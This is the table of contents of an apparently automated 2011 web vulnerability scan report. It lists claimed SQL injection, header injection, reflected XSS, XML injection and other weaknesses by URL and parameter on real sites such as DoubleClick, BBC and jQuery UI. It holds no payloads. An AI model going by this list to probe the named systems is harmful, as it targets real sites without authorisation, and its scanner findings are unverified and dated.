XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 07202011-01

Report generated by XSS.CX at Wed Jul 20 07:19:54 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. SQL injection

1.1. http://googleads.g.doubleclick.net/pagead/ads [bpp parameter]

1.2. http://googleads.g.doubleclick.net/pagead/ads [dt parameter]

1.3. http://googleads.g.doubleclick.net/pagead/ads [ga_vid parameter]

1.4. http://googleads.g.doubleclick.net/pagead/ads [ifi parameter]

1.5. http://googleads.g.doubleclick.net/pagead/ads [xpc parameter]

2. HTTP header injection

2.1. http://ad.doubleclick.net/adi/N3285.tribalfusion/B2343920.21 [REST URL parameter 1]

2.2. http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5426163.28 [REST URL parameter 1]

2.3. http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5426163.29 [REST URL parameter 1]

2.4. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.18 [REST URL parameter 1]

2.5. http://ad.doubleclick.net/adj/N553.AEAOLService/B4970757.33 [REST URL parameter 1]

2.6. http://ad.doubleclick.net/adj/N5823.152304.TRADEDESK/B5621931.6 [REST URL parameter 1]

2.7. http://ad.doubleclick.net/adj/cm.bby.pcmcat203600050025/pcmcat203600050025 [REST URL parameter 1]

2.8. http://ad.doubleclick.net/adj/cm.ver.adhd_search/slideshow/womensymptoms [REST URL parameter 1]

3. Cross-site scripting (reflected)

3.1. http://ad.doubleclick.net/adj/cm.ver.adhd_search/slideshow/womensymptoms [hcpage2 parameter]

3.2. http://ad.doubleclick.net/adj/cm.ver.adhd_search/slideshow/womensymptoms [ugc parameter]

3.3. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [REST URL parameter 1]

3.4. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [REST URL parameter 2]

3.5. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [callback parameter]

3.6. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [name of an arbitrarily supplied request parameter]

3.7. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [pageSize parameter]

3.8. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [show parameter]

3.9. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

3.10. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]

3.11. http://b.scorecardresearch.com/beacon.js [c1 parameter]

3.12. http://b.scorecardresearch.com/beacon.js [c10 parameter]

3.13. http://b.scorecardresearch.com/beacon.js [c2 parameter]

3.14. http://b.scorecardresearch.com/beacon.js [c3 parameter]

3.15. http://b.scorecardresearch.com/beacon.js [c4 parameter]

3.16. http://b.scorecardresearch.com/beacon.js [c5 parameter]

3.17. http://b.scorecardresearch.com/beacon.js [c6 parameter]

3.18. http://cgibin.erols.com/favicon.ico [REST URL parameter 1]

3.19. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl [REST URL parameter 1]

3.20. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl [REST URL parameter 2]

3.21. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl [REST URL parameter 3]

3.22. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl [REST URL parameter 4]

3.23. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl [name of an arbitrarily supplied request parameter]

3.24. http://choices.truste.com/ca [c parameter]

3.25. http://choices.truste.com/ca [cid parameter]

3.26. http://choices.truste.com/ca [name of an arbitrarily supplied request parameter]

3.27. http://choices.truste.com/ca [plc parameter]

3.28. http://choices.truste.com/ca [zi parameter]

3.29. http://citi.bridgetrack.com/a/s/ [BT_PID parameter]

3.30. http://citi.bridgetrack.com/a/s/ [name of an arbitrarily supplied request parameter]

3.31. http://feedinformer.com/search.php [src parameter]

3.32. http://feedinformer.com/search.php [uid parameter]

3.33. http://feedinformer.com/tg.php [uid parameter]

3.34. http://i1.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

3.35. http://i2.services.social.microsoft.com/Search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

3.36. http://i4.services.social.microsoft.com/Search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

3.37. http://img.mediaplex.com/content/0/16228/131652/Lumension_IWL_300x250_A01.js [mpck parameter]

3.38. http://img.mediaplex.com/content/0/16228/131652/Lumension_IWL_300x250_A01.js [mpck parameter]

3.39. http://img.mediaplex.com/content/0/16228/131652/Lumension_IWL_300x250_A01.js [mpvc parameter]

3.40. http://img.mediaplex.com/content/0/16228/131652/Lumension_IWL_300x250_A01.js [mpvc parameter]

3.41. http://img.mediaplex.com/content/0/16228/131652/Lumension_IWL_728x90_A01.js [mpck parameter]

3.42. http://img.mediaplex.com/content/0/16228/131652/Lumension_IWL_728x90_A01.js [mpck parameter]

3.43. http://img.mediaplex.com/content/0/16228/131652/Lumension_IWL_728x90_A01.js [mpvc parameter]

3.44. http://img.mediaplex.com/content/0/16228/131652/Lumension_IWL_728x90_A01.js [mpvc parameter]

3.45. http://jqueryui.com/themeroller/ [bgColorActive parameter]

3.46. http://jqueryui.com/themeroller/ [bgColorContent parameter]

3.47. http://jqueryui.com/themeroller/ [bgColorDefault parameter]

3.48. http://jqueryui.com/themeroller/ [bgColorError parameter]

3.49. http://jqueryui.com/themeroller/ [bgColorHeader parameter]

3.50. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]

3.51. http://jqueryui.com/themeroller/ [bgColorHover parameter]

3.52. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]

3.53. http://jqueryui.com/themeroller/ [bgColorShadow parameter]

3.54. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]

3.55. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]

3.56. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]

3.57. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]

3.58. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]

3.59. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]

3.60. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]

3.61. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]

3.62. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]

3.63. http://jqueryui.com/themeroller/ [bgTextureActive parameter]

3.64. http://jqueryui.com/themeroller/ [bgTextureContent parameter]

3.65. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]

3.66. http://jqueryui.com/themeroller/ [bgTextureError parameter]

3.67. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]

3.68. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]

3.69. http://jqueryui.com/themeroller/ [bgTextureHover parameter]

3.70. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]

3.71. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]

3.72. http://jqueryui.com/themeroller/ [borderColorActive parameter]

3.73. http://jqueryui.com/themeroller/ [borderColorContent parameter]

3.74. http://jqueryui.com/themeroller/ [borderColorDefault parameter]

3.75. http://jqueryui.com/themeroller/ [borderColorError parameter]

3.76. http://jqueryui.com/themeroller/ [borderColorHeader parameter]

3.77. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]

3.78. http://jqueryui.com/themeroller/ [borderColorHover parameter]

3.79. http://jqueryui.com/themeroller/ [cornerRadius parameter]

3.80. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]

3.81. http://jqueryui.com/themeroller/ [fcActive parameter]

3.82. http://jqueryui.com/themeroller/ [fcContent parameter]

3.83. http://jqueryui.com/themeroller/ [fcDefault parameter]

3.84. http://jqueryui.com/themeroller/ [fcError parameter]

3.85. http://jqueryui.com/themeroller/ [fcHeader parameter]

3.86. http://jqueryui.com/themeroller/ [fcHighlight parameter]

3.87. http://jqueryui.com/themeroller/ [fcHover parameter]

3.88. http://jqueryui.com/themeroller/ [ffDefault parameter]

3.89. http://jqueryui.com/themeroller/ [fsDefault parameter]

3.90. http://jqueryui.com/themeroller/ [fwDefault parameter]

3.91. http://jqueryui.com/themeroller/ [iconColorActive parameter]

3.92. http://jqueryui.com/themeroller/ [iconColorContent parameter]

3.93. http://jqueryui.com/themeroller/ [iconColorDefault parameter]

3.94. http://jqueryui.com/themeroller/ [iconColorError parameter]

3.95. http://jqueryui.com/themeroller/ [iconColorHeader parameter]

3.96. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]

3.97. http://jqueryui.com/themeroller/ [iconColorHover parameter]

3.98. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

3.99. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]

3.100. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]

3.101. http://jqueryui.com/themeroller/ [opacityOverlay parameter]

3.102. http://jqueryui.com/themeroller/ [opacityShadow parameter]

3.103. http://jqueryui.com/themeroller/ [thicknessShadow parameter]

3.104. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorActive parameter]

3.105. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorContent parameter]

3.106. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorDefault parameter]

3.107. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorHeader parameter]

3.108. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorHighlight parameter]

3.109. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorHover parameter]

3.110. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityActive parameter]

3.111. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityContent parameter]

3.112. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityDefault parameter]

3.113. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityHeader parameter]

3.114. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityHover parameter]

3.115. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureActive parameter]

3.116. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureContent parameter]

3.117. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureDefault parameter]

3.118. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureHeader parameter]

3.119. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureHover parameter]

3.120. http://jqueryui.com/themeroller/css/parseTheme.css.php [borderColorActive parameter]

3.121. http://jqueryui.com/themeroller/css/parseTheme.css.php [borderColorContent parameter]

3.122. http://jqueryui.com/themeroller/css/parseTheme.css.php [borderColorDefault parameter]

3.123. http://jqueryui.com/themeroller/css/parseTheme.css.php [borderColorHeader parameter]

3.124. http://jqueryui.com/themeroller/css/parseTheme.css.php [borderColorHover parameter]

3.125. http://jqueryui.com/themeroller/css/parseTheme.css.php [cornerRadius parameter]

3.126. http://jqueryui.com/themeroller/css/parseTheme.css.php [ctl parameter]

3.127. http://jqueryui.com/themeroller/css/parseTheme.css.php [fcActive parameter]

3.128. http://jqueryui.com/themeroller/css/parseTheme.css.php [fcContent parameter]

3.129. http://jqueryui.com/themeroller/css/parseTheme.css.php [fcDefault parameter]

3.130. http://jqueryui.com/themeroller/css/parseTheme.css.php [fcHeader parameter]

3.131. http://jqueryui.com/themeroller/css/parseTheme.css.php [fcHover parameter]

3.132. http://jqueryui.com/themeroller/css/parseTheme.css.php [ffDefault parameter]

3.133. http://jqueryui.com/themeroller/css/parseTheme.css.php [fsDefault parameter]

3.134. http://jqueryui.com/themeroller/css/parseTheme.css.php [fwDefault parameter]

3.135. http://jqueryui.com/themeroller/css/parseTheme.css.php [iconColorActive parameter]

3.136. http://jqueryui.com/themeroller/css/parseTheme.css.php [iconColorContent parameter]

3.137. http://jqueryui.com/themeroller/css/parseTheme.css.php [iconColorDefault parameter]

3.138. http://jqueryui.com/themeroller/css/parseTheme.css.php [iconColorHeader parameter]

3.139. http://jqueryui.com/themeroller/css/parseTheme.css.php [iconColorHover parameter]

3.140. http://jqueryui.com/themeroller/css/parseTheme.css.php [name of an arbitrarily supplied request parameter]

3.141. http://js.revsci.net/gateway/gw.js [csid parameter]

3.142. http://kona5.kontera.com/KonaGet.js [l parameter]

3.143. http://kona5.kontera.com/KonaGet.js [rId parameter]

3.144. http://news.bbc.co.uk/2/hi/programmes/from_our_own_correspondent/9538059.stm [name of an arbitrarily supplied request parameter]

3.145. http://news.bbc.co.uk/go/rss/int/news/-/2/hi/programmes/from_our_own_correspondent/9538059.stm [name of an arbitrarily supplied request parameter]

3.146. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/cycling/14179023.stm [name of an arbitrarily supplied request parameter]

3.147. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/football/14168601.stm [name of an arbitrarily supplied request parameter]

3.148. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/golf/14178214.stm [name of an arbitrarily supplied request parameter]

3.149. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/motogp/14177052.stm [name of an arbitrarily supplied request parameter]

3.150. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/rugby_union/welsh/14175299.stm [name of an arbitrarily supplied request parameter]

3.151. http://news.bbc.co.uk/sport2/hi/cycling/14179023.stm [name of an arbitrarily supplied request parameter]

3.152. http://news.bbc.co.uk/sport2/hi/football/14168601.stm [name of an arbitrarily supplied request parameter]

3.153. http://news.bbc.co.uk/sport2/hi/golf/14178214.stm [name of an arbitrarily supplied request parameter]

3.154. http://news.bbc.co.uk/sport2/hi/motogp/14177052.stm [name of an arbitrarily supplied request parameter]

3.155. http://news.bbc.co.uk/sport2/hi/rugby_union/welsh/14175299.stm [name of an arbitrarily supplied request parameter]

3.156. http://rtb0.doubleverify.com/rtb.ashx/verifyc [callback parameter]

3.157. http://s49.sitemeter.com/js/counter.js [site parameter]

3.158. https://secure.domaintools.com/join/ [REST URL parameter 1]

3.159. https://secure.domaintools.com/join/ [REST URL parameter 1]

3.160. https://secure.domaintools.com/log-in/ [REST URL parameter 1]

3.161. https://secure.domaintools.com/log-in/ [REST URL parameter 1]

3.162. https://secure.domaintools.com/shopping-cart/ [REST URL parameter 1]

3.163. https://secure.domaintools.com/shopping-cart/ [REST URL parameter 1]

3.164. http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard [mbox parameter]

3.165. http://whos.amung.us/psrvwidget/ [i parameter]

3.166. http://whos.amung.us/psrvwidget/ [k parameter]

3.167. http://lookupserver.com/ [User-Agent HTTP header]

3.168. http://news.bbc.co.uk/2/hi/programmes/from_our_own_correspondent/9538059.stm [Referer HTTP header]

3.169. http://news.bbc.co.uk/go/rss/int/news/-/2/hi/programmes/from_our_own_correspondent/9538059.stm [Referer HTTP header]

3.170. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/cycling/14179023.stm [Referer HTTP header]

3.171. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/football/14168601.stm [Referer HTTP header]

3.172. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/golf/14178214.stm [Referer HTTP header]

3.173. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/motogp/14177052.stm [Referer HTTP header]

3.174. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/rugby_union/welsh/14175299.stm [Referer HTTP header]

3.175. http://news.bbc.co.uk/sport2/hi/cycling/14179023.stm [Referer HTTP header]

3.176. http://news.bbc.co.uk/sport2/hi/football/14168601.stm [Referer HTTP header]

3.177. http://news.bbc.co.uk/sport2/hi/golf/14178214.stm [Referer HTTP header]

3.178. http://news.bbc.co.uk/sport2/hi/motogp/14177052.stm [Referer HTTP header]

3.179. http://news.bbc.co.uk/sport2/hi/rugby_union/welsh/14175299.stm [Referer HTTP header]

3.180. http://s49.sitemeter.com/js/counter.js [IP cookie]

3.181. http://support.dnsstuff.com/ST.ashx [siteuidut cookie]

4. Flash cross-domain policy

4.1. http://a.tribalfusion.com/crossdomain.xml

4.2. http://ad.afy11.net/crossdomain.xml

4.3. http://ad.turn.com/crossdomain.xml

4.4. http://ajax.googleapis.com/crossdomain.xml

4.5. http://amch.questionmarket.com/crossdomain.xml

4.6. http://api.facebook.com/crossdomain.xml

4.7. http://b.scorecardresearch.com/crossdomain.xml

4.8. http://b.voicefive.com/crossdomain.xml

4.9. http://bbc.112.2o7.net/crossdomain.xml

4.10. http://beacon.afy11.net/crossdomain.xml

4.11. http://bh.contextweb.com/crossdomain.xml

4.12. http://c.atdmt.com/crossdomain.xml

4.13. http://c.betrad.com/crossdomain.xml

4.14. http://c.live.com/crossdomain.xml

4.15. http://cdn.turn.com/crossdomain.xml

4.16. http://cdn5.tribalfusion.com/crossdomain.xml

4.17. http://citicorporate.d2.sc.omtrdc.net/crossdomain.xml

4.18. http://cms.quantserve.com/crossdomain.xml

4.19. http://dg.specificclick.net/crossdomain.xml

4.20. http://external.ak.fbcdn.net/crossdomain.xml

4.21. http://feed.domaintoolsblog.com/crossdomain.xml

4.22. http://fw.adsafeprotected.com/crossdomain.xml

4.23. http://g.live.com/crossdomain.xml

4.24. http://hits.informer.com/crossdomain.xml

4.25. http://i1.ytimg.com/crossdomain.xml

4.26. http://ib.adnxs.com/crossdomain.xml

4.27. http://in.getclicky.com/crossdomain.xml

4.28. http://int-t.pictela.net/crossdomain.xml

4.29. http://js.revsci.net/crossdomain.xml

4.30. http://l.betrad.com/crossdomain.xml

4.31. http://log30.doubleverify.com/crossdomain.xml

4.32. http://log50.doubleverify.com/crossdomain.xml

4.33. http://m.adnxs.com/crossdomain.xml

4.34. http://m.webtrends.com/crossdomain.xml

4.35. http://metrics.citibank.com/crossdomain.xml

4.36. http://p.brilig.com/crossdomain.xml

4.37. http://pix04.revsci.net/crossdomain.xml

4.38. http://r.turn.com/crossdomain.xml

4.39. http://r1-ads.ace.advertising.com/crossdomain.xml

4.40. http://sa.bbc.co.uk/crossdomain.xml

4.41. http://secure-us.imrworldwide.com/crossdomain.xml

4.42. http://segment-pixel.invitemedia.com/crossdomain.xml

4.43. http://spe.atdmt.com/crossdomain.xml

4.44. http://sync.adap.tv/crossdomain.xml

4.45. http://sync.mathtag.com/crossdomain.xml

4.46. http://t.mookie1.com/crossdomain.xml

4.47. http://tf.nexac.com/crossdomain.xml

4.48. http://turn.nexac.com/crossdomain.xml

4.49. http://whos.amung.us/crossdomain.xml

4.50. http://adadvisor.net/crossdomain.xml

4.51. https://adwords.google.com/crossdomain.xml

4.52. http://cbk0.google.com/crossdomain.xml

4.53. https://cbks0.google.com/crossdomain.xml

4.54. http://community.spiceworks.com/crossdomain.xml

4.55. http://feeds.bbci.co.uk/crossdomain.xml

4.56. http://googleads.g.doubleclick.net/crossdomain.xml

4.57. http://kws.kattack.com/crossdomain.xml

4.58. http://news.bbc.co.uk/crossdomain.xml

4.59. http://news.bbcimg.co.uk/crossdomain.xml

4.60. http://newsrss.bbc.co.uk/crossdomain.xml

4.61. http://pagead2.googlesyndication.com/crossdomain.xml

4.62. http://picasaweb.google.com/crossdomain.xml

4.63. http://rd.rlcdn.com/crossdomain.xml

4.64. http://s49.sitemeter.com/crossdomain.xml

4.65. http://te.kontera.com/crossdomain.xml

4.66. http://citi.bridgetrack.com/crossdomain.xml

4.67. http://docs.google.com/crossdomain.xml

4.68. http://khm0.google.com/crossdomain.xml

4.69. http://khm1.google.com/crossdomain.xml

4.70. http://mt0.google.com/crossdomain.xml

4.71. http://mt1.google.com/crossdomain.xml

4.72. http://mt2.google.com/crossdomain.xml

4.73. http://mt3.google.com/crossdomain.xml

5. Silverlight cross-domain policy

5.1. http://b.scorecardresearch.com/clientaccesspolicy.xml

5.2. http://b.voicefive.com/clientaccesspolicy.xml

5.3. http://bbc.112.2o7.net/clientaccesspolicy.xml

5.4. http://c.atdmt.com/clientaccesspolicy.xml

5.5. http://c.live.com/clientaccesspolicy.xml

5.6. http://citicorporate.d2.sc.omtrdc.net/clientaccesspolicy.xml

5.7. http://metrics.citibank.com/clientaccesspolicy.xml

5.8. http://sa.bbc.co.uk/clientaccesspolicy.xml

5.9. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

5.10. http://spe.atdmt.com/clientaccesspolicy.xml

5.11. http://explore.live.com/clientaccesspolicy.xml

6. Cleartext submission of password

6.1. http://67.228.151.70:81/user_session/new

6.2. http://blog.domaintools.com/2011/06/fun-friday-domaintools-binoculars-contest-winners/

6.3. http://blog.domaintools.com/2011/06/fun-friday-win-these-domaintools-binoculars/

6.4. http://blog.domaintools.com/2011/07/you-asked-we-delivered-introducing-the-domaintools-api/

6.5. http://cache.vzw.com/globalnav/globalnav.js

6.6. http://gmf-aeroasia.co.id/

6.7. http://gmf-aeroasia.co.id/WorldClient.dll

6.8. http://support.dnsstuff.com/Login.aspx

7. XML injection

7.1. http://mt0.gmaptiles.co.kr/mt/v=kr1.14/x26hl=en/x26src=api/x26 [REST URL parameter 1]

7.2. http://mt0.gmaptiles.co.kr/mt/v=kr1p.12/x26hl=en/x26src=api/x26 [REST URL parameter 1]

7.3. http://mt1.gmaptiles.co.kr/mt/v=kr1.14/x26hl=en/x26src=api/x26 [REST URL parameter 1]

7.4. http://mt1.gmaptiles.co.kr/mt/v=kr1p.12/x26hl=en/x26src=api/x26 [REST URL parameter 1]

7.5. http://mt2.gmaptiles.co.kr/mt/v=kr1.14/x26hl=en/x26src=api/x26 [REST URL parameter 1]

7.6. http://mt2.gmaptiles.co.kr/mt/v=kr1p.12/x26hl=en/x26src=api/x26 [REST URL parameter 1]

7.7. http://mt3.gmaptiles.co.kr/mt/v=kr1.14/x26hl=en/x26src=api/x26 [REST URL parameter 1]

7.8. http://mt3.gmaptiles.co.kr/mt/v=kr1p.12/x26hl=en/x26src=api/x26 [REST URL parameter 1]

8. Session token in URL

8.1. http://simplexityllc.tt.omtrdc.net/m2/simplexityllc/mbox/standard

8.2. http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard

9. Password field submitted using GET method

9.1. http://blog.domaintools.com/2011/06/fun-friday-domaintools-binoculars-contest-winners/

9.2. http://blog.domaintools.com/2011/06/fun-friday-win-these-domaintools-binoculars/

9.3. http://blog.domaintools.com/2011/07/you-asked-we-delivered-introducing-the-domaintools-api/

10. Cookie scoped to parent domain

10.1. http://blog.domaintools.com/

10.2. http://blog.domaintools.com/2011/06/fun-friday-domaintools-binoculars-contest-winners/

10.3. http://blog.domaintools.com/2011/06/fun-friday-win-these-domaintools-binoculars/

10.4. http://blog.domaintools.com/2011/07/you-asked-we-delivered-introducing-the-domaintools-api/

10.5. http://c.microsoft.com/trans_pixel.aspx

10.6. http://cts-log.channelintelligence.com/

10.7. http://t.mookie1.com/t/v1/imp

10.8. http://t.mookie1.com/t/v1/imp/cc

10.9. http://a.tribalfusion.com/i.ad

10.10. http://a.tribalfusion.com/j.ad

10.11. http://ad.afy11.net/ad

10.12. http://ad.doubleclick.net/adi/N3285.tribalfusion/B2343920.21

10.13. http://ad.doubleclick.net/adj/N553.AEAOLService/B4970757.33

10.14. http://ad.doubleclick.net/adj/cm.ver.adhd_search/slideshow/womensymptoms

10.15. http://ad.turn.com/server/ads.js

10.16. https://adwords.google.com/um/StartNewLogin

10.17. http://ak1.abmr.net/is/cache.vzw.com

10.18. http://ak1.abmr.net/is/r1-ads.ace.advertising.com

10.19. http://akamai.invitemedia.com/set_partner_uid

10.20. http://akamai.mathtag.com/sync/img

10.21. http://akamai.turn.com/r/dd/id/L21rdC85NC9jaWQvMzUxMTE3Ny90LzI/dpuid/CB7517A5C7C813BB2A425B923265579D

10.22. http://amch.questionmarket.com/adsc/d880216/6/42158214/decide.php

10.23. http://amch.questionmarket.com/adsc/d880216/6/42158253/decide.php

10.24. http://amch.questionmarket.com/adsc/d920738/12/42738580/decide.php

10.25. http://api.bizographics.com/v1/profile.redirect

10.26. http://b.scorecardresearch.com/b

10.27. http://b.voicefive.com/b

10.28. http://bbc.112.2o7.net/b/ss/bbcwglobalprod/1/H.22.1/s91786168144611

10.29. http://bbc.112.2o7.net/b/ss/bbcwglobalprod/1/H.22.1/s938140667479

10.30. http://bbc.112.2o7.net/b/ss/bbcwglobalprod/1/H.22.1/s97454771505390

10.31. http://bbc.112.2o7.net/b/ss/bbcwglobalprod/1/H.22.1/s97695995835295

10.32. http://bbc.112.2o7.net/b/ss/bbcwglobalprod/1/H.22.1/s98445279321724

10.33. http://bbc.112.2o7.net/b/ss/bbcwglobalprod/1/H.22.1/s98724351870215

10.34. http://bbc.112.2o7.net/b/ss/bbcwglobalprod/1/H.22.1/s99791251700691

10.35. http://bh.contextweb.com/bh/rtset

10.36. http://c.atdmt.com/c.gif

10.37. http://c.live.com/c.gif

10.38. http://cache.vzw.com/images_b2c/shared/buttons/button_red.gif

10.39. http://cache.vzw.com/images_b2c/shared/layers/overlay_bg.gif

10.40. http://cf.addthis.com/red/p.json

10.41. http://cms.quantserve.com/dpixel

10.42. http://community.axosoft.com/

10.43. http://community.axosoft.com/blogs/fearthebug/archive/2011/05/09/ftb-171-custom-reports-using-date-fields.aspx

10.44. http://community.spiceworks.com/r/595

10.45. http://cspix.media6degrees.com/orbserv/hbpix

10.46. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/3698952182471149434

10.47. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/3698952182471149434

10.48. http://d.audienceiq.com/r/du/id/L2NzaWQvNS9leHRwaWQvNA/extuid/0

10.49. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/3698952182471149434

10.50. http://d.p-td.com/r/dm/mkt/4/mpid/1051202/mpuid/3698952182471149434

10.51. http://d.p-td.com/r/dt/id/L21rdC80L21waWQvMTgwNDg2NA/mpuid/4dc0222e-3ec1-3315-901d-9f5b34470a53

10.52. http://d.p-td.com/r/du/id/L21rdC80L21waWQvMzA0NzA4OQ

10.53. http://d.turn.com/r/dd/id/L2NzaWQvMS9jaWQvMzMxMDg2My90LzI/cat/,/id/L2NzaWQvMS9jaWQvMzMxMTIxNy90LzI/cat/000

10.54. http://dms.technoratimedia.com/setter.cfm

10.55. http://explore.live.com/Handlers/Plt.mvc

10.56. http://explore.live.com/windows-live-hotmail-security-checklist-faq

10.57. http://googleads.g.doubleclick.net/pagead/ads

10.58. http://googleads.g.doubleclick.net/pagead/ads

10.59. http://ib.adnxs.com/getuid

10.60. http://ib.adnxs.com/mapuid

10.61. http://ib.adnxs.com/pxj

10.62. http://ib.adnxs.com/seg

10.63. http://ib.adnxs.com/ttj

10.64. http://ibid2252027210.peachd.dnsstuff.com/style.css

10.65. http://ibid2252027210.plumd.dnsstuff.com/style.css

10.66. http://ibid4216487243.plumd.dnsstuff.com/style.css

10.67. http://id.google.com/verify/EAAAABsfBlgIb5aIMPFtxnqrQP8.gif

10.68. http://id.google.com/verify/EAAAADXjHEyNOyxBq7OsNIrjecs.gif

10.69. http://id.google.com/verify/EAAAAETiZvmKxRNEHIAejUJpNLs.gif

10.70. http://image2.pubmatic.com/AdServer/Pug

10.71. http://int.teracent.net/tase/int

10.72. http://js.revsci.net/gateway/gw.js

10.73. http://m.adnxs.com/msftcookiehandler

10.74. http://maps.google.com/maps

10.75. http://maps.google.com/maps/vp

10.76. http://odb.outbrain.com/utils/get

10.77. http://p.brilig.com/contact/bct

10.78. http://paid.outbrain.com/network/redir

10.79. http://picasaweb.google.com/lh/view

10.80. http://pix04.revsci.net/J08781/b3/0/3/1008211/133868653.js

10.81. http://pix04.revsci.net/J08781/b3/0/3/1008211/219425509.js

10.82. http://pix04.revsci.net/J08781/b3/0/3/1008211/34052071.js

10.83. http://pix04.revsci.net/J08781/b3/0/3/1008211/446414223.js

10.84. http://pix04.revsci.net/J08781/b3/0/3/1008211/654769031.js

10.85. http://pix04.revsci.net/J08781/b3/0/3/1008211/94949941.js

10.86. http://pix04.revsci.net/J08781/b3/0/3/1008211/951237921.js

10.87. http://pixel.33across.com/ps/

10.88. http://pixel.quantserve.com/pixel

10.89. http://pixel.rubiconproject.com/tap.php

10.90. http://r.openx.net/set

10.91. http://r.turn.com/r/beacon

10.92. http://r1-ads.ace.advertising.com/site=783328/size=728090/u=2/bnum=10227708/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.redmondpie.com%252Fjailbreak-4.3.4-ios-iphone-ipad-ipod-touch-using-pwnagetool-bundle-how-to-tutorial%252F

10.93. http://r1-ads.ace.advertising.com/site=783328/size=728090/u=2/bnum=46949635/hr=14/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.redmondpie.com%252F

10.94. http://r1-ads.ace.advertising.com/site=783328/size=728090/u=2/bnum=99071321/hr=14/hl=2/c=3/scres=5/swh=1920x1200/tile=4/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.redmondpie.com%252F

